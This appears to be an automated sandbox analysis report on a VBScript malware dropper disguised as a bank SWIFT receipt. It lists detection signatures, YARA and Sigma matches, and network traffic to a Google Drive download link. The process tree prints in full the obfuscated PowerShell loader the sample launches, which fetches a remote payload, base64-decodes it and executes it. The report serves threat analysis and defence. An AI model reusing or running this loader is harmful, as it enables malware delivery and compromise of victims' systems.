
Windows Analysis Report
e-dekont_swift-details.vbs

Overview

General Information

Sample name: e-dekont_swift-details.vbs
Analysis ID: 1430130
MD5: 0e0c52158e1cba6703c6456335cf228e
SHA1: e79505cdd6282f492c37e632239f0a7fc8324bd4
SHA256: fc7408dea9e0199b472661201fa866e1bf65e7a7d249b5b9e66f036efff85ab1
Tags: geoTURvbs

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Found suspicious powershell code related to unpacking or dynamic code loading
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Very long command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 3236 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 1132 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno Skat/Zooli2Desme0Milit1Morib0Biote0Afdra1Dicty0Summa1 Omni UdtaFSk lei NotorSharpeUntonf Dybso TerexZo ie/ Gdni1Hyper2Oscil1 Tvr .Pitch0Palin ';$Opvurderings=Hungerless 'pro,hUUnexpsAlthieBrugerV nys-OvertA Pal ghlf,ieFantan.uscut,craz ';$Sadelmagervrkstedet=Hungerless 'Dekr.hTaph tDemodtCir.epGrindsSciss:Fri s/Kalci/Leucrd Sul,rForskiTa brvbrewseSrgef.SockmgAftllose geoTransg TukalSupere Alk..Mercuc Udg o.djunm Plur/ FotouBeboecForsa?Se,laeSjuskxE,glipImmisoChangrSlukntKivin=Haustd AlleoMa,ilw .unlnSyrinlSoluroEjendaS,ruedConti&,mfariMglerdB,han=Fladb1MysidN FlorwSensaQShopplHaandXOrrancOverlqLegenB SaraSI,munLmo thzAnap RUn crRNrtfofProtofStere6Bespap G,ll4ArsenA MultYWhynePFasciKLunkhP Be,iRSpirauWasse2MelleG,nsil0Grund8.ombi-Kr bsiEctroTLag.i ';$Inddelingens=Hungerless ' Insp>Pi,na ';$Formode=Hungerless 'Maalei ti,leSw epxSatel ';$Unpark147='Inferiority197';toptekster (Hungerless 'ErnriS NonseForhat,aden- Mi,rCObjeko H dfn hypntSupereAccornVarsetIn,la Super-mass.PSlutnaApophtUntrahdek,n DragT Unen:Frilu\KlitoG Brugi SablgSubsahNilleeHakni. 
Se,gtund sxLimstt H,ls Mass-AnnyuV Eneta tyrl K,onuNonprePo er Bourg$EvovaUBankrnRomanpSjoveaSkotsrUrostku hum1Broc,4Marin7Wishe;signa ');toptekster (Hungerless 'Pris.iFllesf.sbes Udkra( kerot FewdeHofdesMispotSnowm- Fo.lpTimw.aundebtWelteh All. SuleTEtnol:Delit\g rniGPendlibladfg I tehprocoeHamul.ColletBladexAfsvrtP,rag)pr,ck{Ur.ereStepdxTypotiFolket Bord}Myoso;Rack, ');$Lntillgs = Hungerless 'Longee.takncCa,nohZooloo Moor Anded%NeugraArtisppremipWe,tedDe roa Bol.t belnaBrdty% Gibr\IndtakT knoaPyr prAmbilt frysoDigittO.traeSterikAutoms Fienk serro mbrerdis utLufttsHa,nd.ForsvVHemidr A,trd Male Ring&Urbic&T.ecl telefe Sproc,enneh ,ustoBlesk Vigor$Sider ';toptekster (Hungerless 'Tar.a$FlathgFiflklOutguoWon,sbFelesaoverflCar,o:rnefoRBurniaTonefaMet.odSystesQuitcl Torta Stopaned.aeSp,ratDatan=Ca am( SkrecRadikmG.ssydPerif Afma/OttincJacke Gylde$VitriLBely.nLucilt RangiLa.unl PrimlPreteg K.ics Neot)Rec t ');toptekster (Hungerless ' ond$.lejlgO,poslPriksoRestebSpillaEmballAdept:FightVSmutve,ubstrTrad,mOrtogi avorl BiceiHackbnRnkeng PietuE,ecteO,nersKu st=Be jl$DeklaSmart,aRefredEs,ereNe erl Ve.tm .ekla Blotg UsdeeIndverForstvAmanurNubi.k EutrsGigabt UnsceStilndDeliqe PrectPicad.WholesSalpiphen,elOra,giOv rstDanma( B.fa$NovicI uashnSammedStab.dbrydneCirculTelepiWinnonMe,degUnabre B.acn DefusProgr) D,al ');$Sadelmagervrkstedet=$Vermilingues[0];toptekster (Hungerless 'Ti ss$VandigFemkal Coy.oF.stebH.alia Win lGenne:Spe.iFGrap.uStav nOp,hakNonent SaliiSkraaoHystenOve fs Se faNonsofBlondpmyelirUucpnvTawn.nVestri AnagnBepl gPendre H,inngustesarvea=OutstNKorr.eReinswSprin-.artyOHilstb Tripj,vereespildc,enzotTjats DinerSPr.jnySpisesKlerktPartheCangim.enin.tamm N.aimae Spist Supe.TumblW ForteMes,ibAf.adCSte mlFireaiFolkeeE,pulnUafhatMelle ');toptekster (Hungerless 'Atomd$ StivFRverhu .esynUd,ikkbilletun.aci unjoAn,manBoa.lsDkadra,eaktf,atiop heffr MalevEntomnHookaiSierrnA utegRe ise ambrnTyggesAr.er.BenovH H rteV,teraHydr,d Mekae.educrudko.s Tan,[Vand,$ArionOStrejpTils.v Pre 
uNonderRemitd PhileLysaarDespeiF,dtun Par.gExtersfron ]gra,e=.eren$YahunACorreh PreeiMin.tsKonkrtKnfrioAnskurChorei upec aryt ');$Sandfangene=Hungerless ' dkmpFBusl,uHesten,ndosk F dntPurgaiBouleo GlownkommesWishlaStratfSvi,epAchror,reenv Allon ChiniAgonin s opgCompueOmvltn BiotsRegre.Dyst D IndioUnselwOuvernh tudlBat,uo FiniaCoonidForevF ParaiDeaktlkvg neSprag(Outmo$TidsfS PreaaDansed ,rtseIrremlOrkanm Friea orsogFlooreArbejr Emesv AnderElektkSpildsTrykktRaas.e ,kildAnateeDeca t Fred, rklr$R.bbeKAstrolVestsa SsonmDoetmmVa.ske,uxocralko.nN.okee DegesGeuma)Ferio ';$Sandfangene=$Raadslaaet[1]+$Sandfangene;$Klammernes=$Raadslaaet[0];toptekster (Hungerless 'Ophth$ G,legOxblolsubvioNymphbW lfwasus,nlInval:un.asNStal,oSphenn PlancBoussa AfkarAudiotLambke DeadlJaguaiDekomzUreteeTone.dDingesRifer=Kredi(revolTPigene rkaisMletktSporv-RecipP BrasaStanzt pekth Tend Sk dt$Di.krKOradblAn.peaT.stsmTordimUncree arsirDdspanBrevde BandsBirnm)Philo ');while (!$Noncartelizeds) {toptekster (Hungerless 'Ameto$Kol,egRkkehlOprejoperinblkassa,ienolAande:PurpeTHexahi hvill D.oxb Wordakr.tkgchatte indfReprsrAmiabs,loakeretn lBaku s Me s=Blads$P.nthtOffenrVideruWooleeProgr ') ;toptekster $Sandfangene;toptekster (Hungerless 'AntiqSse,rtt .anda,umerrUdsugtMirac-Mi,caSsa,nslWencke.elleeMutu pPin,a Fors.4Fresi ');toptekster (Hungerless 'Comid$Histog Sugel Torpo,gelibRad oa Fronl Uncl:Laur.NArkfdo Vurdn ,oencCopriaDeossrJoypotBrnepeIlseblIntr.iHieroz lageRun edBeanesStyri=,iske(Vaag,TButcheVerd.sHymnetFront-reklaP,ksema,ogittUns ohKont, Bilbo$indskKSkalalInfarasl,tamfly,em.aarnedistir Surcndi.cue Fatts Resp)reple ') ;toptekster (Hungerless 'R,gis$Engagg .inylErhveoSom.sbG,adya skollThr.a:.lappOAmy,op ,orlsLingui Upwag AffreDk man ValedPartiemiliessubvo=Distr$SkuedgWo.drlAvi,noPyranbVict.aToboglEska.:CrossSStrukpArbeji ChocrRestaaRo,anlYder.fFidusjSulfoeRecrudRe ideForfrrPreste ForsnEvneds s,nd+Figur+Un,ut%A,rod$ VedeV Siphe Icter G,mnmGeri,iPr,shlOutcuiDelren SootgSchwauchorieEfters B at.Frstecsup 
rofantauStensn M.lltOve.m ') ;$Sadelmagervrkstedet=$Vermilingues[$Opsigendes];}toptekster (Hungerless 'Konde$T,rbigOakuml ReimoAutombSesquaTo,etl rei :T upeIMyst,nBonittup,pleDragsr GlykmKundseCass zM rgizTrysto HaptsProsc ,ass=Sodde StokrGHondpeLentitTil t-InterCInd.eo Primn olastHonn eNonbunRerattTreho Kvet$Ca spKBespnlDistraBontemHolopmUncone LuftrLouizn OprueTak esRee,l ');toptekster (Hungerless 'Brike$Billeg Kni l ,onsomariobProfuaGastal Fast:Mug,ehIsdesywanwep silueSjl arProtolJe oroBirdlgNucleiPiestcStictaAffall Kaffi,rogrtKlu.cyUd.ta Agte=Tilhu Showi[ prodSA.ekkyvarefs S.aatVi dee H,enm unpo.ForsiCP.ylloSpermnUkuravSu.maePericrSidegtMisd.]Zinkk: ulbj:DiallFSpndhr Vin,osmaasm ,ithB nteaExc,usSterieSpege6R ind4BetroS SurgtFormar No ei,kurknRaadigCello(D.mor$Koty.IbygninEva.utAgaveeinstirDiatomBut.eeBanenzElvrkzomstno SkinsSpalt)vejle ');toptekster (Hungerless ' Neap$PipikgGallelSeparo,riesbMet,daBnnesl Vome:BurguG SchmrGeokeaLnud,a Overlh kseiUtilbgBuffe lokk=skrek Marin[,nvirSunidey nvessTricrt Forpe windm Stik. Ulv TSide,eSubofxChac.tKorpu.Afma.ESeparn ynancM.rahoGrunddReen.i U,denAalbogUopsl]Fusta:Ru,my:DelikAKaldeSFunktCTankeIMacroILards.NonflGHang,e FaldtHalvdSam notHypnor IndeiTredknOpdrigMtaa,(Humou$presbh ,oenyBaad.pScrubeRisotrKilldlBlan.o Ger.gOversiGenercTr.vra FrdilArchaiFishmt.ryseyU amb)Perth ');toptekster (Hungerless 'Uncoh$M.lligSprn.l Sa moKo.mabKvaliaFor.klPa.ne:OmvenD skovi TidevIntereMiljrrGerfasTuli.iBenchf bbediLan se Kn,cdSorte=Subti$PantoGInsurrGinglaLilleaAccesl Almei S bsgmorga. BewesUlsteu Mu.tbZickasHa.vdtForm rMonopi Ca.dnScr wg Dags( F,jl2Indfa8 emil5 Grun0Ankr 8Sen.i7Ble d,devov3,nder0Turna1 mano4 rsta6Fortr).tort ');toptekster $Diversified;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 6432 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cmd.exe (PID: 6124 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\kartotekskorts.Vrd && echo $" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
No configs have been found
Source | Rule | Description | Author | Strings
Process Memory Space: powershell.exe PID: 1132 | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x28200a:$b2: ::FromBase64String(
  • 0x282049:$b2: ::FromBase64String(
  • 0x282089:$b2: ::FromBase64String(
  • 0x2820ca:$b2: ::FromBase64String(
  • 0x28210c:$b2: ::FromBase64String(
  • 0x28214f:$b2: ::FromBase64String(
  • 0x282193:$b2: ::FromBase64String(
  • 0x2821d8:$b2: ::FromBase64String(
  • 0x28221e:$b2: ::FromBase64String(
  • 0x282265:$b2: ::FromBase64String(
  • 0x2822ad:$b2: ::FromBase64String(
  • 0x2822f6:$b2: ::FromBase64String(
  • 0x282340:$b2: ::FromBase64String(
  • 0x28238b:$b2: ::FromBase64String(
  • 0x282480:$b2: ::FromBase64String(
  • 0x284208:$b2: ::FromBase64String(
  • 0x284cad:$b2: ::FromBase64String(
  • 0x284d2e:$b2: ::FromBase64String(
  • 0x512a5:$s1: -join
  • 0x51a3f:$s1: -join
  • 0x9fc77:$s1: -join
Source | Rule | Description | Author | Strings
amsi64_1132.amsi.csv | INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC | Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution | ditekSHen
  • 0x10287:$b2: ::FromBase64String(
  • 0xd5f2:$s1: -join
  • 0x6d9e:$s4: +=
  • 0x6e60:$s4: +=
  • 0xb087:$s4: +=
  • 0xd1a4:$s4: +=
  • 0xd48e:$s4: +=
  • 0xd5d4:$s4: +=
  • 0xf81f:$s4: +=
  • 0xf89f:$s4: +=
  • 0xf965:$s4: +=
  • 0xf9e5:$s4: +=
  • 0xfbbb:$s4: +=
  • 0xfc3f:$s4: +=
  • 0xdd08:$e4: Get-WmiObject
  • 0xdef7:$e4: Get-Process
  • 0xdf4f:$e4: Start-Process

System Summary

Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", ProcessId: 3236, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs", ProcessId: 3236, ProcessName: wscript.exe
Source: Process started; Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements); Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated command line, shown in full in the process tree above]
No Snort rule has matched

AV Detection

Source: http://pesterbdd.com/images/Pester.png; URL Reputation: Label: malware
Source: e-dekont_swift-details.vbs; Virustotal: Detection: 11%
Source: unknown; HTTPS traffic detected: 142.250.65.174:443 -> 192.168.2.6:49699 version: TLS 1.2
Source: unknown; HTTPS traffic detected: 142.250.65.225:443 -> 192.168.2.6:49700 version: TLS 1.2
Source: Binary string: e.pdb#K source: powershell.exe, 00000002.00000002.2193820727.0000017EB8F04000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb`T]e source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Target.pdbion* 1TX]d source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbK source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbo source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb|XEd source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb^C source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000002.00000002.2241435011.0000017ED30C0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdbip source: powershell.exe, 00000002.00000002.2241435011.0000017ED30F6000.00000004.00000020.00020000.00000000.sdmp

Software Vulnerabilities

Source: C:\Windows\System32\wscript.exe; Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: Joe Sandbox View; JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic; HTTP traffic detected: GET /uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.google.com; Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download HTTP/1.1; User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0; Host: drive.usercontent.google.com; Connection: Keep-Alive
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown; DNS traffic detected: queries for: drive.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBCB97000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBA991000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://apis.google.com
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.googPR2
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBC9CE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com
Source: powershell.exe, 00000002.00000002.2240977013.0000017ED2E9B000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT32
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.google.com/uc?export=download&id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iTP
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://drive.usercontent.google.com/download?id=1NwQlXcqBSLzRRff6p4AYPKPRu2G08-iT&export=download
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBABB8000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBBD4D000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://go.micro0
Source: powershell.exe, 00000002.00000002.2222207456.0000017ECAB40000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2222207456.0000017ECA9FE000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://ssl.gstatic.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google-analytics.com;report-uri
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.google.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.googletagmanager.com
Source: powershell.exe, 00000002.00000002.2194313854.0000017EBAEB2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAF1E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2194313854.0000017EBAED0000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: https://www.gstatic.com
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown; Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown; Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown; Network traffic detected: HTTP traffic on port 49700 -> 443

System Summary

Source: amsi64_1132.amsi.csv, type: OTHER; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTR; Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
Source: C:\Windows\System32\wscript.exe; Process created: Commandline size = 7584
Source: C:\Windows\System32\wscript.exe; COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe; Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [obfuscated command line, shown in full in the process tree above]
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD348985FA 2_2_00007FFD348985FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 2_2_00007FFD34898352 2_2_00007FFD34898352
Source: e-dekont_swift-details.vbs | Initial sample: Strings found which are bigger than 50
Source: amsi64_1132.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1132, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winVBS@6/4@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\kartotekskorts.Vrd
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6432:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_u1wct10w.5d1.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: e-dekont_swift-details.vbs | Virustotal: Detection: 11%
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\e-dekont_swift-details.vbs"
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Koldblodig = 1;$Arbejdskatalogs119='Substrin';$Arbejdskatalogs119+='g';Function Hungerless($Besnakkelsen){$Phylloxerae=$Besnakkelsen.Length-$Koldblodig;For($Monsterhood=5; $Monsterhood -lt $Phylloxerae; $Monsterhood+=(6)){$Apadana+=$Besnakkelsen.$Arbejdskatalogs119.Invoke($Monsterhood, $Koldblodig);}$Apadana;}function toptekster($Hypoglottis){& ($Formode) ($Hypoglottis);}$Ahistoric=Hungerless ' Af,rM,ithsoUnconzdesigi,sperlSparelOut,oaDelim/ Neur5Armag.Sinds0.nven Tanta( FlytW CramidriftnTyphadSurreoFueliw SammsSek,u feathNBromdTSkval Bandc1over 0Ejend. M.nn0,ooln;Torde FishWDual iLaighnun.on6 Pudr4Stvfn;Chrom Stivexdebar6Grsni4Famul;Dib e forudrKoralvOveri:Ku ib1Unawa2Befar1S.lva.Gri n0aeroc)Jordo DelkrGInvaleGuiltc LoddkFlueno 